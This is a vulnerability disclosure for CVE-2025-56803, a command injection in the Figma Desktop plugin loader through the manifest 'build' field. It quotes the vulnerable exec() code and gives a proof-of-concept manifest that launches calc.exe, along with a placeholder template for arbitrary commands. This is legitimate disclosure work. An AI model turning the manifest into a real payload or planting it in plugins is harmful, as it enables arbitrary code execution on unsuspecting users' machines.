# CVE-2025-56803
### OS Command Injection Vulnerability via Plugin Execution in Figma Desktop Application

## 1. Overview

<img src="images/figma-icon.png" alt="Figma Icon" align="left" width="150" hspace="10"/>
<br clear="left"/>

- **Name**: Figma Desktop Application  
- **Version**: 125.6.5  
- **Vendor**: Figma, Inc.  
- **CWE**: [CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](https://cwe.mitre.org/data/definitions/78.html)  
- **CVSS**: 8.4 HIGH  
- **Vector String**: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
## 2. Summary
Figma Desktop Application (version 125.6.5) contains a command injection vulnerability in plugin loader. A malicious plugin manifest (`manifest.json`) can abuse the `build` field, which is passed directly into `child_process.exec()` without validation.   

This allows arbitrary OS command execution as soon as the plugin is loaded, without security warnings or prompts.  

## 3. Details
The vulnerability stems from code located in `main.js`, which imports Node.js’s built-in `child_process` module:
```javascript
Zlt = require("child_process")
```
Later, if the `build` field is present in a plugin’s `manifest.json` file and its value is a string, application executes the value directly using `child_process.exec()` without any sanitization or validation:
```javascript
if (
  s.build &&
  typeof s.build === "string" &&
  (l.path = process.env.PATH || "",
  await new Promise((g) => {
    (0, Zlt.exec)(s.build, { cwd: i }, (y, I, P) => {
      l.stdout = I;
      l.stderr = P;
      y && (l.buildErrCode = y.code);
      g();
    });
  }),
  l.buildErrCode
)
  return l;
```
As a result, the following `manifest.json` file contained in a malicious plugin would cause the value of the build field to be executed as an OS command:
```json
{
  "name": "<NAME>",
  "id": "<ID>",
  "api": "1.0.0",
  "main": "code.js",
  "build": "<COMMAND>",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}
```
This execution flow is embedded in Figma’s plugin handling logic, and the inclusion of the `require("child_process")` call in `main.js` confirms that command execution is built directly into the application’s core logic.
## 4. Proof of Concept (PoC)
By running the [plugin](poc-plugin) that includes the following malicious `manifest.json`:
```json
{
  "name": "poc",
  "id": "1535549154235958412",
  "api": "1.0.0",
  "main": "code.js",
  "build": "calc.exe",
  "capabilities": [],
  "enableProposedApi": false,
  "documentAccess": "dynamic-page",
  "editorType": [
    "figma"
  ],
  "networkAccess": {
    "allowedDomains": [
      "none"
    ]
  }
}
```
Once this plugin is registered in Figma and executed, the specified OS command (`calc.exe`) runs immediately.

https://github.com/user-attachments/assets/48e0a47a-0d1c-4a92-b9ff-33e9559fd5e7


## 5. Recommendations
Although the execution of the `build` field is an officially supported feature in the Figma Desktop Application, the application should avoid relying on user-controlled fields in `manifest.json`, such as `build`, wherever possible. If such fields must be supported, they must undergo strict input validation to prevent command injection.  

Additionally, the use of Node.js `child_process.exec()` should be avoided, and safer alternatives with explicit argument handling should be adopted instead.  

Furthermore, although this issue could superficially be viewed as a form of self-RCE, it should be regarded as a valid and impactful vulnerability for the following reasons. The "Import from Manifest" feature, while seemingly intended for developers, is located in an easily accessible part of the application, making it usable by general end-users without technical expertise. Although plugins are typically distributed through the official Figma Community store, it is common for plugins to be shared through external communities, third-party sites, or collaborative project repositories. Most users do not anticipate that installing or importing a Figma plugin could lead to arbitrary code execution, which makes this a plausible and effective vector for social engineering attacks.
## 6. References
- https://www.cve.org/CVERecord?id=CVE-2025-56803
- https://nvd.nist.gov/vuln/detail/CVE-2025-56803  
- https://www.figma.com/plugin-docs/manifest/
